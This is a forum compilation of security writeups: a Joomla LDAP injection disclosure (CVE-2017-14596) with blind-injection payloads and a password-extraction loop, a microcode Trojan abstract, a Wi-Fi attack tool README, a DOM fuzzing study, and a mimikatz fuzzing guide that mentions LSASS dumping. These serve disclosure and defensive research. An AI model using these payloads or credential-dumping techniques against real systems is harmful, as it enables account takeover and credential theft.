             $authenticate = JAuthentication::getInstance();
             $authenticate->authenticate($credentials, $options);
         }
     }

     /libraries/joomla/authentication/authentication.php

     class JAuthentication extends JObject
     {
         public function authenticate($credentials, $options = array())
         {
             ⋮
             $plugin->onUserAuthenticate($credentials, $options, $response);
         }
     }

     Based on the plugin that is used for authentication, the authenticate method passes the credentials to the onUserAuthenticate method. If Joomla! is configured to use LDAP for authentication, the LDAP plugin's method is invoked.

     /plugins/authentication/ldap/ldap.php

     class PlgAuthenticationLdap extends JPlugin
     {
         public function onUserAuthenticate($credentials, $options, &$response)
         {
             ⋮
             $userdetails = $ldap->simple_search(
                 str_replace(
                     '[search]',
                     $credentials['username'],
                     $this->params->get('search_string')
                 )
             );
         }
     }

     In the LDAP plugin, the username credential is embedded into the LDAP query specified in the search_string option. According to the official Joomla! documentation, the search_string configuration option is "a query string used to search for the user, where [search] is directly replaced by search text from the login field", for example "uid=[search]". The LDAP query is then passed to the simple_search method of the LdapClient, which connects to the LDAP server and performs the ldap_search.
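     The substitution above can be re-created in a few lines of Python (my sketch, not Joomla! code) to show why an attacker-controlled username ends up as LDAP filter markup: the `;` separator lets the attacker append an entirely new filter.

```python
# Python re-creation of the PHP flow above, with the example
# search_string from the Joomla! docs and a malicious username.
search_string = "uid=[search]"
username = "XXX;(&(uid=Admin)(userPassword=s*))"

# str_replace('[search]', $credentials['username'], $search_string):
query = search_string.replace("[search]", username)

# simple_search(): explode on ';' and wrap each part in parentheses:
filters = ["(" + part + ")" for part in query.split(";")]
print(filters)
# ['(uid=XXX)', '((&(uid=Admin)(userPassword=s*)))']
```

     The second element is a fully attacker-chosen filter that the server will pass to ldap_search, which is exactly the injection primitive the blind attack below builds on.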
/libraries/vendor/joomla/ldap/src/LdapClient.php

class LdapClient
{
    public function simple_search($search)
    {
        $results = explode(';', $search);

        foreach ($results as $key => $result)
        {
            $results[$key] = '(' . $result . ')';
        }

        return $this->search($results);
    }

    public function search(array $filters, ...)
    {
        foreach ($filters as $search_filter)
        {
            $search_result = @ldap_search($res, $dn, $search_filter, $attr);
            ⋮
        }
    }
}

Even though RIPS is unaware of the exact LDAP query that is loaded from an external configuration file, it successfully detects and reports the root cause of this vulnerability: user input is mixed unsanitized into LDAP query markup that is passed to the sensitive ldap_search function. The vulnerability was detected within 7 minutes in half a million lines of Joomla! code. The truncated analysis results are available in our RIPS demo application. Please note that we limited the results to the issues described in this post in order to ensure a fix is available.

See RIPS report

Proof Of Concept - Blind LDAP Injection

The lack of input sanitization of the username credential used in the LDAP query allows an adversary to modify the result set of the LDAP search. By using wildcard characters and by observing different authentication error messages, the attacker can literally search for login credentials progressively, sending a series of payloads that guess the credentials character by character.

XXX;(&(uid=Admin)(userPassword=A*))
XXX;(&(uid=Admin)(userPassword=B*))
XXX;(&(uid=Admin)(userPassword=C*))
...
XXX;(&(uid=Admin)(userPassword=s*))
...
XXX;(&(uid=Admin)(userPassword=se*))
...
XXX;(&(uid=Admin)(userPassword=sec*))
...
XXX;(&(uid=Admin)(userPassword=secretPassword))

Each of these payloads yields exactly one of two possible states, which allows an adversary to abuse the server as an oracle. A filter bypass, which is not covered in this blog post, is necessary for exploitation.
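The character-by-character extraction loop driving these payloads can be sketched in a few lines of Python. This is a self-contained illustration only: the oracle function below simulates the server's two observable states locally instead of sending real login requests, and the filter bypass required in practice is omitted.

```python
import string

SECRET = "secretPassword"  # stands in for the password stored in LDAP

def oracle(username):
    """Simulate the Joomla! login oracle: the injected filter
    (&(uid=Admin)(userPassword=<guess>*)) matches iff the stored password
    starts with <guess>. A real attack would POST the payload as the login
    username and distinguish the two authentication error messages."""
    marker = "(userPassword="
    start = username.index(marker) + len(marker)
    guess = username[start:username.index("*)", start)]
    return SECRET.startswith(guess)

def extract_password(charset=string.ascii_letters + string.digits):
    """Grow the recovered prefix one character per confirmed guess."""
    recovered = ""
    while True:
        for c in charset:
            payload = "XXX;(&(uid=Admin)(userPassword=%s*))" % (recovered + c)
            if oracle(payload):
                recovered += c
                break
        else:
            return recovered  # no character extends the prefix: done
```

With a printable charset of ~62 characters, this naive variant needs at most 62 requests per password character; the bit-per-request optimization mentioned below reduces that to 7-8.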
With an optimized version of these payloads, one bit per request can be extracted from the LDAP server, which results in a highly efficient blind LDAP injection attack.

Time Line

Date        What
2017/07/27  Provided vulnerability details and PoC to vendor
2017/07/29  Vendor confirmed security issue
2017/09/19  Vendor released fixed version

Summary

As one of the most popular open source CMS applications, Joomla! receives many code reviews from the security community. Yet a single missed security vulnerability in its 500,000 lines of code can lead to a server compromise. With the help of static code analysis, RIPS detected a critical LDAP injection vulnerability (CVE-2017-14596) that had remained undiscovered for over 8 years. The vulnerability allows an attacker to steal login credentials from Joomla! installations that use LDAP authentication. We would like to thank the Joomla! Security Strike Team for the excellent coordination and remediation of this issue, and we recommend updating to the latest Joomla! version 3.8 immediately.

More about RIPS

Author: Dr. Johannes Dahse, CEO, Co-Founder

Johannes has been exploiting security vulnerabilities in PHP code for 10 years. He is an active speaker at academic and industry conferences and a recognized expert in this field. He earned his Ph.D. in IT security / static code analysis at the Ruhr-University Bochum, Germany. Previously, he worked as a security consultant for leading companies worldwide.

Sursa: https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
  11. USENIX

Published on 15 Sep 2017

Philipp Koppe, Benjamin Kollenda, Marc Fyrbiak, Christian Kison, Robert Gawlik, Christof Paar, and Thorsten Holz, Ruhr-University Bochum

Microcode is an abstraction layer on top of the physical components of a CPU, present in most general-purpose CPUs today. In addition to facilitating complex and vast instruction sets, it also provides an update mechanism that allows CPUs to be patched in place without requiring any special hardware. While it is well known that CPUs are regularly updated with this mechanism, very little is known about its inner workings, given that microcode and the update mechanism are proprietary and have not been thoroughly analyzed yet. In this paper, we reverse engineer the microcode semantics and the inner workings of the update mechanism of conventional COTS CPUs, using AMD’s K8 and K10 microarchitectures as examples. Furthermore, we demonstrate how to develop custom microcode updates. We describe the microcode semantics and additionally present a set of microprograms that demonstrate the possibilities offered by this technology. To this end, our microprograms range from CPU-assisted instrumentation to microcoded Trojans that can even be reached from within a web browser and enable remote code execution and cryptographic implementation attacks.

View the full program: https://www.usenix.org/sec17/program
  12. Hijacker

Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.

This application requires an ARM Android device with a wireless adapter that supports Monitor Mode. A few Android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc.) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work.

Features

Information Gathering

View a list of access points and stations (clients) around you (even hidden ones)
View the activity of a specific network (by measuring beacons and data packets) and its clients
Statistics about access points and stations
See the manufacturer of a device (AP or station) from the OUI database
See the signal power of devices and filter the ones that are closer to you
Save captured packets in a .cap file

Attacks

Deauthenticate all the clients of a network (either targeting each one (effective) or without a specific target)
Deauthenticate a specific client from the network it's connected to
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or for everyone
Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

Other

Leave the app running in the background, optionally with a notification
Copy commands or MAC addresses to clipboard
Includes the required tools, no need for manual installation
Includes the nexmon driver and management utility for BCM4339 devices
Set commands to enable and disable monitor mode automatically
Crack .cap files with a custom wordlist
Create custom actions and run them on an access point or a client easily
Sort and filter Access Points by many parameters
Export all the gathered information to a file
Add an alias to a device (by MAC) for easier identification

Installation

Make sure:

you are on Android 5+
you are rooted (SuperSU is required; if you are on CM/LineageOS install SuperSU)
you have a firmware that supports Monitor Mode on your wireless interface

Download the latest version here. When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to the home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and that it's in monitor mode.

Troubleshooting

This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture; otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need.

In settings, there is an option to test the tools. If something fails, you can click 'Copy test command' and select the tool that fails.
This will copy a test command to your clipboard, which you can run in a terminal to see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings.

If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself; it's just a txt file in your external storage directory. The part with the most important information is shown in the activity. Please do not report bugs for devices that are not supported or when you are using an outdated version.

Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault; it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development, so bugs are to be expected.

Warning

Legal

It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to test. Using software that puts a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second that it's untraceable. I am not responsible for how you use this application or for any damage you may cause.

Device

The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with a factory reset). I am not responsible for any damage caused to your device by this software. Consider yourself warned.

Donate

If you like my work, you can buy me a beer.

Sursa: https://github.com/chrisk44/Hijacker
  13. Thursday, September 21, 2017

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero

Introduction

Historically, DOM engines have been one of the largest sources of web browser bugs. And while in recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also rare for a vendor to publish a security update that doesn’t contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers, as well as browser vendors who care about security, invest in building DOM fuzzers and associated infrastructure. As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead, the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extensible, and can be reused by myself as well as other researchers for fuzzing other targets besides just the DOM. We named this new fuzzer Domato (credits to Tavis for suggesting the name).
Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.

The fuzzer consists of several parts:

The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects of generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:

I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.

Otherwise, Domato supports features that you’d expect from a DOM fuzzer, such as:

Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.
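The base-engine idea (repeatedly expanding a start symbol via grammar productions until only terminal text remains) can be illustrated with a toy generator. This is an illustration of the generative approach only, not Domato's actual grammar syntax or API; the grammar below is invented for the example.

```python
import random

# Toy grammar in the spirit of (but far simpler than) a DOM grammar:
# <angle-bracket> tokens that appear as keys are expanded recursively,
# everything else is emitted literally.
GRAMMAR = {
    "<html>":    ["<element>", "<element><element>"],
    "<element>": ["<div>", "<svg>"],
    "<div>":     ["<div style='<cssrule>'>text</div>"],
    "<svg>":     ["<svg width='<int>'><rect/></svg>"],
    "<cssrule>": ["color: red", "width: <int>px"],
    "<int>":     ["0", "1", "65535"],
}

def generate(symbol="<html>", depth=0, max_depth=8):
    """Pick a random production for `symbol` and expand any known
    sub-symbols recursively; unknown '<...>' sequences are copied
    through as literal markup."""
    if depth > max_depth:          # keep recursion bounded
        return ""
    out = ""
    rule = random.choice(GRAMMAR[symbol])
    i = 0
    while i < len(rule):
        if rule[i] == "<":
            j = rule.index(">", i) + 1
            token = rule[i:j]
            if token in GRAMMAR:
                out += generate(token, depth + 1, max_depth)
                i = j
                continue
        out += rule[i]
        i += 1
    return out
```

Each call produces a fresh, syntactically valid sample such as `<div style='color: red'>text</div>`; a real DOM fuzzer layers thousands of productions plus JavaScript-generation logic on top of exactly this kind of loop.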
Instead of going into much technical detail here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I will invite community contributions covering the areas I might have missed in the fuzzer or grammar creation.

Setup

We tested the 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100,000,000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100,000,000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the price range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptible VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run.

Here are additional details of the fuzzing setup for each browser:

Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

Mozilla Firefox was fuzzed on internal Google infrastructure (Linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.

Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of an ASAN build, page heap was applied to the iexplore.exe process to make it easier to catch some types of issues.
Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure, since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why, for fuzzing it, we created a virtual cluster of Windows 10 VMs on Microsoft Azure. As with Internet Explorer, page heap was applied to the MicrosoftEdgeCP.exe process before fuzzing.

Instead of fuzzing Safari directly, which would require Apple hardware, we used WebKitGTK+, which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.

Results

Without further ado, the number of security bugs found in each browser is captured in the table below. Only security bugs were counted in the results (doing anything else is tricky, as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in the development version would be caught by internal review and fuzzing before release).

Vendor     Browser            Engine    Number of Bugs  Project Zero Bug IDs
Google     Chrome             Blink     2               994, 1024
Mozilla    Firefox            Gecko     4*              1130, 1155, 1160, 1185
Microsoft  Internet Explorer  Trident   4               1011, 1076, 1118, 1233
Microsoft  Edge               EdgeHtml  6               1011, 1254, 1255, 1264, 1301, 1309
Apple      Safari             WebKit    17              999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
           Total                        31**

*While adding up the number of bugs results in 33, 2 of the bugs affected multiple browsers.
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count it here.
As can be seen in the table, most browsers did relatively well in the experiment, with only a couple of security-relevant crashes found. Since the same methodology used to result in a significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment, with a significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform, as evidenced by exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago they were using the same DOM engine (WebKit). It appears that after the Blink/WebKit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!
When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser; instead they focus on just a single component (the DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as the presence and security of a sandbox, bugs in other components such as scripting engines, etc. I also cannot disregard the possibility that, within the DOM, my fuzzer is more capable of finding certain types of issues than others, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas, we wanted to combine it with DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and a modified WinAFL DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
2. The fuzzer spawns an IE process which opens a harness HTML page.
3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe.
4. After the sample executes, it notifies the harness, which notifies the fuzzer to stop collecting coverage.
5. The coverage map is examined and, if it contains unseen coverage, the corresponding sample is added to the corpus.
6. Go to step 3 until all samples are executed or the IE process crashes.
7. Periodically minimize the corpus using AFL’s cmin algorithm.
8. Go to step 1.
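Stripped of the harness plumbing, the flow above is an ordinary coverage-guided loop. A minimal sketch follows; the mutate and run_and_collect callbacks are placeholders standing in for the Domato mutation engine and the WinAFL/DynamoRIO coverage client, not real APIs of either project.

```python
def coverage_guided_fuzz(corpus, mutate, run_and_collect, rounds=100):
    """Minimal coverage-guided loop in the spirit of the steps above.
    `mutate(sample)` returns a new sample; `run_and_collect(sample)`
    returns (coverage_set, crashed). Both are caller-supplied stubs."""
    seen = set()        # global coverage map (all edges observed so far)
    crashes = []
    for _ in range(rounds):
        # step 1: derive a new batch from the current corpus
        batch = [mutate(s) for s in list(corpus)]
        for sample in batch:               # steps 2-6: run each sample
            cov, crashed = run_and_collect(sample)
            if crashed:
                crashes.append(sample)
                break                      # restart with a fresh process
            if not cov <= seen:            # step 5: any unseen coverage?
                seen |= cov
                corpus.append(sample)
    return corpus, crashes
```

The key property is in step 5: a sample survives into the corpus only if it touched coverage no earlier sample did, so the corpus grows toward inputs exercising new code.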
The following set of mutations was used to produce new samples from the existing ones:

Adding new CSS rules
Adding new properties to the existing CSS rules
Adding new HTML elements
Adding new properties to the existing HTML elements
Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.

Conclusion

As stated before, DOM engines have been one of the largest sources of web browser bugs. While these types of bugs are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing, as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.

The big question at the end is: are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Posted by Ben at 9:35 AM

Sursa: https://googleprojectzero.blogspot.ro/2017/09/the-great-dom-fuzz-off-of-2017.html
  14. HACK THE HACKER – FUZZING MIMIKATZ ON WINDOWS WITH WINAFL & HEATMAPS (0DAY)

On 22. Sep

In this blog post, I want to explain two topics from a theoretical and practical point of view:

How to fuzz Windows binaries with source code available (this part is for developers) and
How to deal with big input files (aka heatmap fuzzing) and crash analysis (for security consultants; more technical)

Since this blog post got too long and I didn’t want to remove important theory, I marked background knowledge with grey color. Feel free to skip these sections if you are already familiar with this knowledge. If you are only interested in the exploitable mimikatz flaws, you can jump to the chapter “Practice: Analysis of the identified crashes“.

I (René Freingruber from SEC Consult Vulnerability Lab) am going to give a talk at heise devSec (and IT-SECX and DefCamp) about fuzzing binaries for developers, and therefore I wanted to test different approaches to fuzzing Windows applications where source code is available (the audience are most likely developers). To my knowledge there are several blog posts talking about fuzzing Linux applications with AFL or libFuzzer (just compile the application with afl-gcc instead of gcc or add some flags to clang), but there is no blog post explaining the concept and setup for Windows. This blog post tries to fill this gap. Fuzzing is a very important concept during development, and therefore all developers should know how to do it correctly and that such a setup can be simple and fast!

WHY I CHOSE MIMIKATZ AS FUZZING TARGET

To demonstrate fuzzing I had to find a good target where source code is available. At the same time, I wanted to learn more about the internals of the application by reading the source code. Therefore, my decision fell on mimikatz because it’s an extremely useful tool for security consultants (and hackers) and I always wanted to understand how mimikatz internally works.
Mimikatz is a powerful hacker tool for Windows which can be used to extract plaintext credentials, hashes of currently logged on users, machine certificates and many other things. Moreover, mimikatz contains over 261 000 lines of code, must parse many different data structures and is therefore likely to be affected by vulnerabilities itself. At this point I also want to say that penetration testing would not be the same without the amazing work of Benjamin Delpy gentilkiwi, the author of mimikatz.

The next thing I need is a good attack vector. Why should I search for vulnerabilities if there is no real attack vector which can trigger the vulnerability? Mimikatz can be used to dump cleartext credentials and hashes of currently logged in users from the LSASS process. But if there exists a bug in the parsing code of mimikatz, what exactly could I achieve with this? I could just exploit myself, because mimikatz gets executed on the same system. Well, not always.

As it turns out, well-educated security consultants and hackers do not directly invoke mimikatz on the owned system. Instead, it’s nowadays widespread practice to create a minidump of the LSASS process on the owned system, download it and invoke mimikatz locally (on the attacker system). Why do we do this? Because dropping mimikatz on the owned system could trigger all kinds of alerts (AntiVirus, Application Whitelisting, Windows Logs, …) and, because we want to stay under the radar, we don’t want these alerts. Instead, we can use Microsoft-signed binaries to dump the LSASS process (e.g. Task Manager, procdump.exe, msbuild.exe or sqldumper.exe).

Now we have a good attack vector! We can create a honeypot, inject some malicious stuff into our own LSASS process, wait until a hacker owns it, dumps the LSASS process and invokes mimikatz on his own system reading our manipulated memory dump file, and watch the reverse shells coming in!
This and similar attack vectors can be interesting features in the future for deception technologies such as CyberTrap (https://www.cybertrap.com/).

To be fair, exploiting this scenario can be quite difficult because mimikatz is compiled with protections such as ASLR and DEP, and exploitation of such a client-side application is extremely challenging (we don’t have the luxury of a remote memory leak nor of scripting possibilities such as with browsers or PDF readers). However, such client-side scriptless exploits are not impossible; for example, see https://scarybeastsecurity.blogspot.co.at/2016/11/0day-exploit-advancing-exploitation.html. To my surprise, mimikatz contained a very powerful vulnerability which allows us to bypass ASLR (and DEP).

THEORY: FUZZING WINDOWS BINARIES

We don’t want to write a mimikatz-specific fuzzer (with knowledge about the parsing structures, implemented checks and so on). Instead, we want to use something called “coverage-guided fuzzing” (or feedback-based fuzzing). This means we want to extract code coverage information during fuzzing. If one of our mutated input files (the memory dump files) generates more code coverage in mimikatz, we want to add it to our fuzzing queue and fuzz this input later as well. That means we start with one dump file and the fuzzer identifies different code paths itself (ideally all) for us and therefore “learns” all the internal parsing logic autonomously! This also means that we only have to write a fuzzer once and can use it against nearly all kinds of applications!

Luckily for us, we don’t even have to write such a fuzzer because someone else already did an excellent job! Currently the most commonly used fuzzer is called AFL (American fuzzy lop) and implements exactly this idea. It turned out that AFL is extremely effective at identifying vulnerabilities. In my opinion, this is because of four major characteristics of AFL:

1. It is extremely fast.
2. It extracts edge coverage (with hit count) and not only code coverage, which, simplified, means that we try to maximize executed “paths” and not “code”. (E.g. if we have an IF statement, code coverage would put the input file which executes the code inside the IF into the queue. Edge coverage, on the other hand, would put one entry with, and one entry without, the IF body-code into the queue.)
3. Because of 1), it can implement deterministic mutation (do every operation on every byte/bit of the input). More on this later when talking about heatmap fuzzing.
4. It’s extremely simple to use. Fuzzing can be started within several minutes!

The big question now is: how does AFL extract the code/edge coverage information? The answer depends on the configured mode of AFL. The default option is to “hack” the object files generated by gcc and insert instrumentation code at all possible code locations. There is also an LLVM mode where an LLVM compiler pass is used to insert the instrumentation. And then there is a qemu mode, for when source code is not available, which emulates the binary and adds instrumentation via qemu. There are several forks which extend AFL with other instrumentation possibilities. For example, hardware features can also be used to extract code coverage (WinAFL-IntelPT, kAFL). Another idea is to use dynamic instrumentation frameworks such as PIN or DynamoRio (e.g. WinAFL). These frameworks can dynamically instrument (during runtime) the target binary, which means that a dispatcher loads the next instructions which should be executed and adds additional instrumentation code before (and after) them. All that requires dynamic relocation of the instructions while being completely transparent to the target application. This is quite complicated, but the framework hides all that logic from the user. Obviously, this approach is not fast (but works on Windows and has many cool features for the future!).
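The edge-coverage bookkeeping behind point 2 can be sketched in a few lines. This is a simplified model of the scheme described in AFL's technical documentation: block IDs are normally random constants compiled into the target, and the table is a shared-memory region rather than a plain Python list.

```python
MAP_SIZE = 65536          # AFL's default bitmap size
bitmap = [0] * MAP_SIZE   # hit counts, indexed by edge hash
prev_loc = 0

def on_basic_block(cur_loc):
    """Called at every instrumented basic block. The index depends on the
    (previous, current) pair, so the bitmap records edges, not merely
    visited blocks; shifting prev_loc keeps edge A->B distinct from B->A."""
    global prev_loc
    bitmap[(cur_loc ^ prev_loc) % MAP_SIZE] += 1   # edge hit count
    prev_loc = cur_loc >> 1
```

Executing the block sequence 101 -> 202 -> 303 touches three distinct bitmap slots, one per edge; taking the same blocks in a different order would hash to different slots, which is exactly why edge coverage distinguishes paths that plain code coverage cannot.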
When source code is available, I thought there should be the same possibility on Windows as AFL offers on Linux (with GCC). My first attempt was to use "libFuzzer" on Windows. LibFuzzer is a fuzzer like AFL, but it fuzzes at function level and is therefore more suitable for developers. AFL fuzzes full binaries per default, but can also be started in a persistent mode where it fuzzes at function level. LibFuzzer uses the "source-based code coverage" feature of the LLVM clang compiler, which is exactly what I wanted to use for coverage information on Windows. After some initial errors I could compile mimikatz with LLVM on Windows. When adding the flags for source-based code coverage I again got errors, which can be fixed by adding the required libraries to the linker include paths. However, this flag added the same functions to all object files, which resulted in linker errors. The only way I could solve this was to merge all .c files into one huge file. Since this approach was more of a pain than anything else, I didn't pursue it further for the talk. Note that using LLVM for application analysis on Windows could be a very interesting approach in the future!

The next thing I tested was WinAFL in syzygy mode, and this was exactly what I was looking for! For a more detailed description of syzygy see https://doar-e.github.io/blog/2017/08/05/binary-rewriting-with-syzygy/. At this point I want to thank Ivan Fratric (developer of WinAFL) and Axel 0vercl0k Souchet (developer of the syzygy mode) for their amazing job, and of course Michal Zalewski for AFL!

PRACTICE: FUZZING WINDOWS BINARIES

You can download WinAFL from https://github.com/ivanfratric/winafl. All we must do is include the header, add the code

while (__afl_persistent_loop()) {
    // code to fuzz
}

to the project which we want to fuzz, and compile a 32-bit application with the /PROFILE linker flag (Visual Studio -> project properties -> Linker -> Advanced -> Profile).
For mimikatz I removed the command prompt code from the wmain function (inside mimikatz.c) and just called kuhl_m_sekurlsa_all(argc, argv), because I wanted to directly dump the hashes/passwords from the minidump (i.e. issue the sekurlsa::logonpasswords command at program invocation). Since mimikatz would extract this information from the LSASS process per default, I added a line inside kuhl_m_sekurlsa_all() to load the dump instead. Moreover, I added the persistent loop inside this function. Here is how my new kuhl_m_sekurlsa_all() function looks:

NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[])
{
    while (__afl_persistent_loop()) {
        kuhl_m_sekurlsa_reset();    // sekurlsa::minidump command
        pMinidumpName = argv[1];    // sekurlsa::minidump command
        kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages)); // sekurlsa::logonpasswords command
    }
    return NT_SUCCESS;
}

Hint: Do not use the above code during fuzzing. I added a subtle flaw, which I'm going to explain later. Can you already spot it?

After compilation, we can start the binary and see some additional messages. The next step is to instrument the code. For this to work we must register "msdia140.dll". This can be done via the command:

regsvr32 C:\path\to\msdia140.dll

